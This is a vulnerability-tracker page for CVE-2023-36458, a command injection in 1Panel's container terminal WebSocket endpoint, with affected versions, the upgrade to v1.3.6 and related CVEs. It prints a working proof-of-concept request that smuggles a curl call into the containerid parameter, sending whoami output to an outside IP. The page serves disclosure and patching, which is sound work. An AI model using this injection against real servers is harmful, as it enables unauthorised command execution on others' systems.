CVE-2023-36458Medium· 6.3▾ Sunlit1Panel vulnerable to command injection when entering the container terminal
▾ Sunlit zone — Low / medium · no exploitation signal
impact 34.7 · likelihood 0.5 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Exploit-prediction probability, daily snapshots since Sep 12.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via OSV
Last analysed / modified upstream
2.3%
The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal.
backend\app\api\v1\terminal.go#ContainerWsSsh

GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-WebSocket-Version: 13
Origin: http://192.168.109.152:40982
Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ==
Connection: keep-alive, Upgrade
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

Affected versions: <= 1.3.5
The vulnerability has been fixed in v1.3.6.
It is recommended to upgrade the version to v1.3.6.
If you have any questions or comments about this advisory:
Open an issue in https://github.com/1Panel-dev/1Panel Email us at [email protected]
github.com/1Panel-dev/1Panel < 1.3.6Upgrade to a patched release:
github.com/1Panel-dev/1Panel 1.3.6Connected by shared product, vendor, weakness, or advisory.
CVE-2023-39965Medium· 6.51Panel Arbitrary File Download vulnerability
CVE-2024-30257Medium· 5.91Panel's password verification is suspected to have a timing attack vulnerability
CVE-2024-39907Critical· 9.81Panel has an SQL injection issue related to the orderBy clause
CVE-2024-27288Medium· 6.31Panel open source panel project has an unauthorized vulnerability.
CVE-2026-79919Medium· 6.3MaxKB is an open-source AI assistant for enterprise
CVE-2026-79918Medium· 6.3MaxKB is an open-source AI assistant for enterprise